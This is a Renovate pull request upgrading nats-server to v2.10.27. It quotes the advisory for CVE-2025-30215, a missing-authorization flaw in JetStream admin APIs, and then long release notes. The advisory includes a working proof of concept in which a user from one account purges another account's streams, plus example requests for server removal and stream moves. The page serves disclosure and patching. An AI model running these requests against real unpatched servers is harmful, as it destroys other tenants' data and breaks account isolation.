Conversation

renovate bot commented Apr 15, 2025

This PR contains the following updates:

Package: github.com/nats-io/nats-server/v2
Change:  v2.10.17 -> v2.10.27

GitHub Vulnerability Alerts

CVE-2025-30215

Advisory

The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.

Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.

Affected versions

NATS Server:

  • Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27

Original Report

(Lightly edited to confirm some supposition and in the summary to use past tense)

Summary

nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.

In all cases, the APIs are not properly restricted to system-account users. Instead, any authorized user can execute them, including across account boundaries, as long as that user merely has permission to publish on $JS.>.

Only the first appears to be of the highest severity. All are included in this single report because they seem likely to share the same underlying root cause.

Reproduction of the ACCOUNT.PURGE case is below. The others are like it.

Details & Impact

Issue 1: $JS.API.ACCOUNT.PURGE.*

Any user may perform an account purge of any other account (including their own).

Risk: total destruction of JetStream configuration and data.

Issue 2: $JS.API.SERVER.REMOVE

Any user may remove servers from JetStream clusters.

Risk: loss of data redundancy, reduction of service quality.

Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE

Any user may cause streams to be moved between servers.

Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.

Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*
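
For illustration, the requests for Issues 2 and 3 would follow the same shape as the ACCOUNT.PURGE PoC below; the subjects are those listed above, while the payloads here are hypothetical sketches, not verified request schemas:

# Issue 2 (hypothetical payload): ask the metaleader to remove a named server
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.SERVER.REMOVE' '{"peer":"<server-name>"}'

# Issue 3 (payloads omitted/hypothetical): move another account's stream, or cancel a move
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.STREAM.MOVE.TEST.stream1' '{}'
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.STREAM.CANCEL_MOVE.TEST.stream1' ''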

Mitigations

It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.

Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
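
As a hardening sketch (assuming the standard NATS user permissions syntax, where deny entries take precedence), such an account admin could keep a broad JetStream grant while explicitly denying the system subjects above:

users: [{
  user: 'a', password: 'a',
  permissions: {
    publish: {
      allow: ['$JS.>'],                                  # broad JS admin within the account
      deny: ['$JS.API.ACCOUNT.>', '$JS.API.SERVER.>']    # block the unprotected system APIs
    }
  }
}]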

Scope of impact

Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All three allow system-level access to non-system account users.

While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.

Additional notes

It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict access to system-account users. As such, it may serve as a pattern for how to properly authorize the other APIs.
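
If so, a request along the lines of the PoC below would be expected to fail for a non-system user (expected behavior, not a captured transcript):

# Expected to be rejected or to time out, since only system-account users
# should be able to trigger a metaleader stepdown:
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.META.LEADER.STEPDOWN' ''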

PoC

Environment

Tested with:
nats-server 2.10.26 (installed via homebrew)
nats cli 0.1.6 (installed via homebrew)
macOS 13.7.4

Reproduction steps

$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS': {
    users: [{user: 'sys', password: 'sys'}]
  },
  'TEST': {
    jetstream: true,
    users: [{user: 'a', password: 'a'}]
  },
  'TEST2': {
    jetstream: true,
    users: [{user: 'b', password: 'b'}]
  }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users are properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
                      User: sys
                   Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
                           User: a
                        Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
                           User: b
                        Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg "
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭───────────────────────────────────────────────────────────────────────────────╮
│                                    Streams                                    │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B	tmp/jetstream/TEST/streams/stream1/obs
8.0K	tmp/jetstream/TEST/streams/stream1/msgs
 16K	tmp/jetstream/TEST/streams/stream1
 16K	tmp/jetstream/TEST/streams
 16K	tmp/jetstream/TEST
 16K	tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).

# According to the source comments, user b shouldn't even be able to purge its own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B	tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined


Release Notes

nats-io/nats-server (github.com/nats-io/nats-server/v2)

v2.10.27

Compare Source

Changelog

Go Version
  • 1.24.1
CVEs
  • This release contains fixes for CVE-2025-30215, a CRITICAL severity vulnerability affecting all NATS Server versions from v2.2.0, prior to v2.11.1 or v2.10.27.
Fixed

JetStream

  • Correctly validate the calling account on a number of system API calls
  • Check system and account limits when processing a stream restore
  • Fixed a performance regression when using max messages per subject of 1 (#​6688)
Complete Changes

v2.10.26

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
Dependencies
  • github.com/nats-io/nats.go v1.39.1 (#​6574)
  • golang.org/x/crypto v0.34.0 (#​6574)
  • golang.org/x/sys v0.30.0 (#​6487)
  • golang.org/x/time v0.10.0 (#​6487)
  • github.com/nats-io/nkeys v0.4.10 (#​6494)
  • github.com/klauspost/compress v1.18.0 (#​6565)
Added

General

  • New server option no_fast_producer_stall allows disabling the stall gates, preferring instead to drop messages to consumers that would have caused a stall (#​6500)
  • New server option first_info_timeout to control how long a leafnode connection should wait for the initial connection info, useful for high latency links (#​5424)
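
A hypothetical configuration sketch for these two options (option names from the notes above; the values and the per-remote placement of first_info_timeout are assumptions):

no_fast_producer_stall: true   # drop to stalling consumers rather than stalling the producer

leafnodes {
  remotes [
    # assumed placement: wait longer for the initial INFO on a high-latency link
    { url: 'nats-leaf://hub.example.com:7422', first_info_timeout: '10s' }
  ]
}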

Monitoring

  • The gatewayz monitoring endpoint can now return subscription information (#​6525)
  • The raftz and ipqueuesz endpoints are now exposed via the system account as well (#​6439)
Improved

General

  • The configured write deadline is now applied to only the current batch of write vectors (with a maximum of 64MB), making it easier to configure and reason about (#​6471)
  • Publishing through a service import to an account with no interest will now generate a "no responders" error instead of silently dropping the message (#​6532)
  • Adjust the stall gate for producers to be less penalizing (#​6568, #​6579)

JetStream

  • Consumer signaling from streams has been optimized, taking consumer filters into account, significantly reducing CPU usage and overheads when there are a large number of consumers with sparse or non-overlapping interest (#​6499)
  • Num pending with multiple filters, enforcing per-subject limits and loading the per-subject info now use a faster subject tree lookup with fewer allocations (#​6458)
  • Optimizations for calculating num pending etc. by handling literal subjects using a faster path (#​6446)
  • Optimizations for loading the next message with multiple filters by avoiding linear scans in message blocks in some cases, particularly where there are lots of deletes or a small number of subjects (#​6448)
  • Avoid unnecessary system time calls when ranging a large number of interior deletes, reducing CPU time (#​6450)
  • Removed unnecessary locking around finding out if Raft groups are leaderless, reducing contention (#​6438)
  • Improved the error message when trying to change the consumer type (#​6408)
  • Improved the error messages returned by healthz to be more descriptive about why the healthcheck failed (#​6416)
  • The limit of concurrent disk I/O operations that JetStream can perform simultaneously has been raised (#​6449)
  • Reduced the number of allocations needed for handling client info headers around the JetStream API and service imports/exports (#​6453)
  • Calculating the starting sequence for a source consumer has been optimized for streams where there are many interior deletes (#​6461)
  • Messages used for cluster replication are now correctly accounted for in the statistics of the origin account (#​6474)
  • Reduce the amount of time taken for cluster nodes to start campaigning in some cases (#​6511)
  • Reduce memory allocations when writing new messages to the filestore write-through cache (#​6576)

Monitoring

  • The routez endpoint now reports pending_bytes (#​6476)
Fixed

General

  • The max_closed_clients option is now parsed correctly from the server configuration file (#​6497)

JetStream

  • A bug in the subject state tracking that could result in consumers skipping messages on interest or WQ streams has been fixed (#​6526)
  • A data race between the stream config and looking up streams has been fixed (#​6424) Thanks to @​evankanderson!
  • Fixed an issue where Raft proposals were incorrectly dropped after a peer remove operation, which could result in a stream desync (#​6456)
  • Stream disk reservations will no longer be counted multiple times after stream reset errors have occurred (#​6457)
  • Fixed an issue where a stream could desync if the server exited during a catchup (#​6459)
  • Fixed a deadlock that could occur when cleaning up large numbers of consumers that have reached their inactivity threshold (#​6460)
  • A bug which could result in stuck consumers after a leader change has been fixed (#​6469)
  • Fixed an issue where it was not possible to update a stream or consumer if up against the max streams or max consumers limit (#​6477)
  • The preferred stream leader will no longer respond if it has not completed setting up the Raft node yet, fixing some API timeouts on stream info and other API calls shortly after the stream is created (#​6480)
  • Auth callouts can now correctly authenticate the username and password or authorization token from a leafnode connection (#​6492)
  • Stream ingest from an imported subject will now continue to work correctly after an update to imports/exports via a JWT update (#​6498)
  • Parallel stream creation requests for the same stream will no longer incorrectly return a limits error when max streams is configured (#​6502)
  • Consumers created or recreated while a cluster node was down are now handled correctly after a snapshot when the node comes back online (#​6507)
  • Invalidate entries in the pending append entry cache correctly, reducing the chance of an incorrect apply (#​6513)
  • When compacting or truncating streams or logs, correctly clean up the delete map, fixing potential memory leaks and the potential for index.db to not be recovered correctly after a restart (#​6515)
  • Retry removals from acks if they have been missed due to the consumer ack floor being ahead of the stream applies, correcting a potential stream drift across replicas (#​6519)
  • When recovering from block files, do not put deleted messages below the first sequence into the delete map (#​6521)
  • Preserve max delivered messages with interest retention policy using the redelivered state, such that a new consumer will not unexpectedly remove the message (#​6575)

Leafnodes

  • Do not incorrectly send duplicate messages when a queue group has members across different leafnodes when connected through a gateway (#​6517)

WebSockets

  • Fixed a couple of cases where memory may not be reclaimed from Flate compressors correctly after a WebSocket client disconnect or error scenario (#​6451)

Tests

Complete Changes

v2.10.25

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
Dependencies
Improved

JetStream

  • Raft groups will no longer snapshot too often in some situations, improving performance (#​6277)
  • Optimistically perform stream and consumer snapshots on a normal shutdown (#​6279)
  • The stream snapshot interval has been removed, now relying on the compaction minimum, which improves performance (#​6289)
  • Raft groups will no longer report current while they are paused with pending commits (#​6317)
  • Unnecessary client info fields have been removed from stream and consumer assignment proposals, API advisories and stream snapshot/restore advisories (#​6326, #​6338)
  • Reduced lock contention between the JetStream lock and Raft group locks (#​6335)
  • Advisories will only be encoded and sent when there is interest, reducing CPU usage (#​6341)
  • Consumers with inactivity thresholds will now start less clean-up goroutines, which can reduce load on the goroutine scheduler (#​6344)
  • Consumer cleanup goroutines will now stop faster when the server shuts down (#​6351)
Fixed

JetStream

  • Subject state consistency with some message removal patterns (#​6226)
  • A performance issue has been fixed when updating the per-subject state (#​6235)
  • Fixed consistency issues with detecting partial writes in the filestore (#​6283)
  • A race condition between removing peers and updating replica counts has been fixed (#​6316)
  • Pre-acks for a sequence are now removed when the message is removed, correcting a potential memory leak (#​6325)
  • Metalayer snapshot errors are now surfaced correctly (#​6361)
  • Healthchecks no longer re-evaluate stream and consumer assignments, avoiding some streams and consumers being unexpectedly recreated shortly after a deletion (#​6362)
  • Clients should no longer timeout on a retried ack with the AckAll policy after a server restart (#​6392)
  • Replicated consumers should no longer get stuck after leader changes due to incorrect accounting (#​6387)
  • Consumers will now correctly handle the case where messages queued for delivery have been removed, fixing a delivery slowdown (#​6387, #​6399)
  • The API in-flight metric has been fixed so that it does not drift after the queue has been dropped (#​6373)
  • Handles for temporary files are now closed correctly if compression errors occur (#​6390) — Thanks to @​deem0n for the contribution!
  • JetStream will now shut down correctly when detecting that the store directory underlying filesystem has become read-only (#​6292) — Thanks to @​souravagrawal for the contribution!

Leafnodes

  • Fixed an interest propagation issue that could occur when the hub has a user with subscribe permissions on a literal subject (#​6291)
  • Fixed a bug where all queue interest across leafnodes could be dropped over gateways in a supercluster deployment after a leafnode connection drops (#​6377)

Tests

Complete Changes

v2.10.24

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

CVEs
  • Vulnerability check warnings for CVE-2024-45337 are addressed by the dependency update to x/crypto, although the NATS Server does not use the affected functionality and is therefore not vulnerable
Go Version
  • 1.23.4
Dependencies
  • golang.org/x/crypto v0.31.0 (#​6246)
  • github.com/nats-io/jwt/v2 v2.7.3 (#​6256)
  • github.com/nats-io/nkeys v0.4.9 (#​6255)
Fixed

General

  • Request/reply tracking with allow_responses permission is now pruned more regularly, fixing performance issues that can get worse over time (#​6064)

JetStream

  • Revert a change introduced in 2.10.23 that could potentially cause a consumer info call to fail if it takes place immediately after the consumer was created in some large or heavily-loaded clustered setups (#​6250)
  • Minor fixes to subject state tracking (#​6244)
  • Minor fixes to healthz and healthchecks (#​6247, #​6248, #​6232)
  • A calculation used to determine if exceeding limits has been corrected (#​6264)
  • Raft groups will no longer spin when truncating the log fails, i.e. during shutdown (#​6271)

WebSockets

  • A WebSocket close frame will no longer incorrectly include a status code when not needed (#​6260)
Complete Changes

v2.10.23

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
Dependencies
Added

JetStream

  • Support for responding to forwarded proposals (for future use, #​6157)

Windows

  • New ca_certs_match option has been added in the tls block for searching the certificate store for only certificates matching the specified CAs (#​5115)
  • New cert_match_skip_invalid option has been added in the tls block for ignoring certificates that have expired or are not valid yet (#​6042)
  • The cert_match_by option can now be set to thumbprint, allowing an SHA1 thumbprint to be specified in cert_match (#​6042, #​6047)
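
A hypothetical tls block combining these options (the option names come from the notes above; cert_store and the value formats are assumptions):

tls {
  cert_store: 'WindowsLocalMachine'
  cert_match_by: 'thumbprint'
  cert_match: '<sha1-thumbprint>'        # hypothetical thumbprint value
  cert_match_skip_invalid: true          # ignore expired or not-yet-valid certificates
  ca_certs_match: ['Example Corp Root CA']
}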
Improved

JetStream

  • Reduced the number of allocations in consumers from get-next requests and when returning some error codes (#​6039)
  • Metalayer recovery at startup will now group assets for creation/update/deletion and handle pending consumers more reliably, reducing the chance of ghost consumers and misconfigured streams after restarts (#​6066, #​6069, #​6088, #​6092)
  • Creation of filtered consumers is now considerably faster with the addition of a new multi-subject num-pending calculation (#​6089, #​6112)
  • Consumer backoff should now be correctly respected with multiple in-flight deliveries to clients (#​6104)
  • Add node10 node size to stree, providing better memory utilisation for some subject spaces, particularly those that are primarily numeric or with numeric tokens (#​6106)
  • Some JetStream log lines have been made more consistent (#​6065)
  • File-backed Raft groups will now use the same sync intervals as the filestore, including when sync always is in use (#​6041)
  • Metalayer snapshots will now always be attempted on shutdown (#​6067)
  • Consumers will now detect if an ack is received past the stream last sequence and will no longer register pre-acks from a snapshot if this happens, reducing memory usage (#​6109)
  • Reduced copies and number of allocations when generating headers for republished messages (#​6127)
  • Adjusted the spread of filestore sync timers (#​6128)
  • Reduced the number of allocations in Raft group send queues, improving performance (#​6132)
  • Improvements to Raft append entry handling and log consistency (#​5661, #​5689, #​5714, #​5957, #​6027, #​6073)
  • Improvements to Raft stepdown behaviour (#​5666, #​5344, #​5717)
  • Improvements to Raft elections and vote handling (#​5671, #​6056)
  • Improvements to Raft term handling (#​5684, #​5792, #​5975, #​5848, #​6060)
  • Improvements to Raft catchups (#​5987, #​6038, #​6072)
  • Improvements to Raft snapshot handling (#​6053, #​6055)
  • Reduced the overall metalayer snapshot frequency by increasing the minimum interval and no longer pre-empting consumer deletes (#​6165)
  • Consumer info requests for non-existent consumers will no longer be relayed, reducing overall load on the metaleader (#​6176)
  • The metaleader will now log if it takes a long time to perform a metalayer snapshot (#​6178)
  • Unnecessary client and subject information will no longer be included in the meta snapshots, reducing the size and encoding time (#​6185)
  • Sourcing consumers for R1 streams will now be set up inline when the stream is recovered (#​6219)
  • Introduced additional jitter to the timer for writing stream state, to smooth out sudden spikes in I/O (#​6220)
Fixed

General

  • Load balancing queue groups from leaf nodes in a cluster (#​6043)

JetStream

  • Invalidate the stream state when a drift between the tracking states has been detected (#​6034)
  • Fixed a panic in the subject tree when checking for full wildcards (#​6049)
  • Snapshot processing should no longer spin when there is no leader (#​6050)
  • Replicated stream message framing can no longer overflow with extremely long subjects, headers or reply subjects (#​6052)
  • Don’t replace the leader’s snapshot when shutting down, potentially causing a desync (#​6053)
  • Consumer start sequence when specifying an optional start time has been fixed (#​6082)
  • Raft snapshots will no longer be incorrectly removed when truncating the log back to applied (#​6055)
  • Raft state will no longer be deleted if creating a stream/consumer failed because the server was shutting down (#​6061)
  • Fixed a panic when shutting down whilst trying to set up the metagroup (#​6075)
  • Raft entries that we cannot be sure were applied during a shutdown will no longer be reported as applied (#​6087)
  • Corrected an off-by-one error in the run-length encoding of interior deletes, which could incorrectly remove an extra message (#​6111)
  • Don’t process duplicate stream assignment responses when the stream is being reassigned due to placement issues (#​6121)
  • Corrected use of the stream mutex when checking interest (#​6122)
  • Raft entries for consumers that we cannot be sure were applied during a shutdown will no longer be reported as applied (#​6133)
  • Consistent state update behavior between file store and memory store, including a fixed integer underflow (#​6147)
  • No longer send a state snapshot when becoming a consumer leader as it may not include all applied state (#​6151)
  • Do not install snapshots on shutdown from outside the monitor goroutines as it may race with upper layer state (#​6153)
  • The consumer Backoff configuration option now correctly checks the MaxDelivery constraint (#​6154)
  • Consumer check floor will no longer surpass the store ack floor (#​6146)
  • Replicated consumers will no longer update their delivered state until quorum is reached, fixing some drifts that can occur on a leader change (#​6139)
  • Resolved a deadlock when removing the leader from the peer set (#​5912)
  • Don’t delete disk state if a stream or consumer creation fails during shutdown (#​6061)
  • The metalayer will no longer generate and send snapshots when switching leaders, reducing the chance that snapshots can be sent with stale assignments (#​5700)
  • When restarting a Raft group, wait for previous goroutines to shut down, fixing a race condition (#​5832)
  • Correctly empty the Raft snapshots directory for in-memory assets (#​6169)
  • A race condition when accessing the stream assignments has been fixed (#​6173)
  • Subject state will now be correctly cleared when compacting in-memory streams, fixing some potential replica drift issues (#​6187)
  • Stream-level catchups no longer return more than they should (#​6213)

Leafnodes

  • Fixed queue distribution where a leafnode expressed interest on behalf of a gateway in complex setups (#​6126)
  • A number of leafnode interest propagation issues have been fixed, making it possible to distinguish leaf subscriptions from local routed subscriptions (#​6161)
  • Credential files containing CRLF line endings will no longer error (#​6175)

WebSockets

  • Ensure full writes are made when compression is in use (#​6091)

Windows

  • Using the LocalMachine certificate store is now possible from a non-administrator user (#​6019)

Tests

Complete Changes

v2.10.22

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.8
Dependencies
  • golang.org/x/crypto v0.28.0 (#​5971)
  • golang.org/x/sys v0.26.0 (#​5971)
  • golang.org/x/time v0.7.0 (#​5971)
  • go.uber.org/automaxprocs v1.6.0 (#​5944)
  • github.com/klauspost/compress v1.17.11 (#​6002)
Added

Config

  • A warning will now be logged at startup if the JetStream store directory appears to be in a temporary folder (#​5935)
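
For example, pointing the store at a persistent location (path illustrative) avoids the warning:

jetstream {
  store_dir: '/var/lib/nats/jetstream'   # a persistent path rather than a temporary folder
}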
Improved

General

  • More efficient searching of sublists for the number of subscriptions (#​5918)

JetStream

  • Improve performance when checking interest and correcting ack state on interest-based or work queue streams (#​5963)
  • Safer default file permissions for JetStream filestore and logs (#​6013)
Fixed

JetStream

  • Large numbers of message delete tombstones will no longer result in unusually large message blocks on disk (#​5973)
  • The server will no longer panic when restoring corrupted subject state containing null characters (#​5978)
  • A data race when processing append entries has been fixed (#​5970)
  • Fix a stream desync across replicas that could occur after stalled or failed catch-ups (#​5939)
  • Consumers will no longer race with the filestore when fetching messages, fixing some cases where consumers can get stuck with workqueue streams and max messages per subject limits (#​6003)
  • Pull consumers will now recalculate max delivered when expiring messages, such that the redelivered status does not report incorrectly and cause a stall with a max deliver limit (#​5995)
  • Clustered streams should no longer desync if a catch-up fails due to a loss of leader (#​5986)
  • Fixed a panic that could occur when calculating asset placement in a JetStream cluster (#​5996)
  • Fixed a panic when shutting down a clustered stream (#​6007)
  • Revert earlier PR #​5785 to restore consumer start sequence clipping, fixing an issue where sourcing/mirroring consumers could skip messages (#​6014)

Leafnodes

  • Load balancing of queue groups over leafnode connections (#​5982)
Complete Changes

v2.10.21

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.7
Dependencies
Added

Config

  • New TLS min_version option for configuring the minimum supported TLS version (#​5904)
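
A minimal sketch, assuming the value is given as a version string:

tls {
  cert_file: './server-cert.pem'
  key_file: './server-key.pem'
  min_version: '1.3'   # refuse TLS 1.2 and below (value format assumed)
}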
Improved

JetStream

  • Global JetStream API queue hard limit for protecting the system (#​5900, #​5923)
  • Orphaned ephemeral consumer clean-up is now logged at debug level only (#​5917)

Monitoring

  • statsz messages are now sent every 10 seconds instead of every 30 seconds (#​5925)
  • Include JetStream pending API request count in statsz messages and jsz responses for monitoring (#​5923, #​5926)
Fixed

JetStream

  • Fix an issue comparing the stream configuration with the updated stream assignment on stream create (#​5854)
  • Improvements to recovering from old or corrupted index.db (#​5893, #​5901, #​5907)
  • Ensure that consumer replicas and placement are adjusted properly when scaling down a replicated stream (#​5927)
  • Fix a panic that could occur when trying to shut down while the JetStream meta group was in the process of being set up (#​5934)

Monitoring

  • Always update account issuer in accountsz (#​5886)

OCSP

  • Fix peer validation on the HTTPS monitoring port when OCSP is enabled (#​5906)

Config

  • Support multiple trusted operators using a config file (#​5896)
Complete Changes

v2.10.20

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.6
Fixed

JetStream

  • Fix regression in KV CAS operations on R=1 replicas introduced in v2.10.19 (#​5841) Thanks to @​cbrewster for the report!
Complete Changes

v2.10.19

Compare Source

Changelog

Refer to the 2.10 Upgrade Guide for backwards compatibility notes with 2.9.x.

Go Version
  • 1.22.6
Dependencies
Improved

General

  • Reduced allocations in various code paths that check for subscription interest (#​5736, #​5744)
  • Subscription matching for gateways and reply tracking has been optimized (#​5735)
  • Client outbound queues now limit the number of flushed vectors to ensure that very large outbound buffers don’t unfairly compete with write deadlines (#​5750)
  • In client and leafnode results cache, populate new entry after pruning (#​5760)
  • Use newly-available generic sorting functions (#​5757)
  • Set a HTTP read timeout on profiling, monitoring and OCSP HTTP servers (#​5790)
  • Improve behavior of rate-limited warning logs (#​5793)
  • Use dedicated queues for the handling of statsz and profilez system events (#​5816)

Clustering

  • Reduce the chances of implicit routes being duplicated (#​5602)

JetStream

  • Optimize LoadNextMsg for wildcard consumers that are consuming over a large subject space (#​5710)
  • When sync/sync_interval is set to always, metadata files for streams and consumers are now written using O_SYNC to guarantee flushes to disk (#​5729)
  • Walking an entire subject tree is now faster and allocates less (#​5734)
  • Try to snapshot stream state when a change in the clustered last failed sequence is detected (#​5812)
  • Message blocks are no longer loaded into memory unnecessarily when checking if we can skip ahead when loading the next message (#​5819)
  • Don’t attempt to re-compact blocks that cannot be compacted, reducing unnecessary CPU usage and disk I/Os (#​5831)

Monitoring

  • Add StreamLeaderOnly filter option to return replica results only for groups for which that node is the leader (#​5704)
  • The profilez API endpoint in the system account can now acquire and return CPU profiles (#​5743)

Miscellaneous

Fixed

General

  • Fixed a panic when looking up the account for a client (#​5713)
  • The ClientURL() function now returns correctly formatted IPv6 host literals (#​5725)
  • Fixed incorrect import cycle warnings when subject mapping is in use (#​5755)
  • A race condition that could cause slow consumers to leave behind subscription interest after the connection has been closed has been fixed (#​5754)
  • Corrected an off-by-one condition when growing to or shrinking from node48 in the subject tree (#​5826)

JetStream

  • Retention issue that could cause messages to be incorrectly removed on a WorkQueuePolicy stream when consumers did not cover the entire subject space (#​5697)
  • Fixed a panic when calling the raftz endpoint during shutdown (#​5672)
  • Don’t delete NRG group persistent state on disk when failing to create subscriptions (#​5687)
  • Fixed behavior when checking for the first block that matches a consumer subject filter (#​5709)
  • Reduce the number of compactions made on filestore blocks due to deleted message tombstones (#​5719)
  • Fixed maximum messages per subject exceeded unexpected error on streams using a max messages per subject limit of 1 and discard new retention policy (#​5761)
  • Fixed bad meta state on restart that could cause deletion of assets (#​5767)
  • Fixed R1 streams exceeding quota limits (#​5771)
  • Return the correct sequence for a duplicated message on an interest policy stream when there is no interest (#​5818)
  • Fixed setting the consumer start sequence when that sequence does not yet appear in the stream (#​5785)
  • Connection type in scoped signing keys are now honored correctly (#​5789)
  • Expected last sequence per subject logic has now been harmonized across clustered stream leaders and followers, fixing a potential drift (#​5794)
  • Stream snapshots are now always installed correctly on graceful shutdown (#​5809)
  • A data race between consumer and stream updates has been resolved (#​5820)
  • Avoid increasing the cluster last failed sequence

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate bot commented Apr 15, 2025

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 10 additional dependencies were updated
  • The go directive was updated for compatibility reasons

Details:

Package Change
go 1.22 -> 1.23.0
github.com/nats-io/nats.go v1.36.0 -> v1.39.1
github.com/klauspost/compress v1.17.9 -> v1.18.0
github.com/minio/highwayhash v1.0.2 -> v1.0.3
github.com/nats-io/jwt/v2 v2.5.7 -> v2.7.3
github.com/nats-io/nkeys v0.4.7 -> v0.4.10
go.uber.org/automaxprocs v1.5.3 -> v1.6.0
golang.org/x/crypto v0.24.0 -> v0.34.0
golang.org/x/sys v0.21.0 -> v0.30.0
golang.org/x/text v0.16.0 -> v0.22.0
golang.org/x/time v0.5.0 -> v0.10.0
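
For reference, a minimal sketch of the equivalent manual update (the exact commands Renovate ran are not shown here):

$ go get github.com/nats-io/nats-server/v2@v2.10.27
$ go mod tidy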

codecov bot commented Apr 15, 2025

Codecov Report

All modified and coverable lines are covered by tests ✅

Project coverage is 54.44%. Comparing base (3cf2082) to head (1dd0113).

Additional details and impacted files
@@            Coverage Diff             @@
##             main      #76      +/-   ##
==========================================
- Coverage   54.81%   54.44%   -0.38%     
==========================================
  Files          25       25              
  Lines        1609     1969     +360     
==========================================
+ Hits          882     1072     +190     
- Misses        630      800     +170     
  Partials       97       97              


renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 3cb83fd to 1dd0113 on May 7, 2025 at 11:02
renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 1dd0113 to 35725fc on August 10, 2025 at 14:04
renovate bot force-pushed the renovate/go-github.com-nats-io-nats-server-v2-vulnerability branch from 35725fc to 69e2624 on October 9, 2025 at 09:53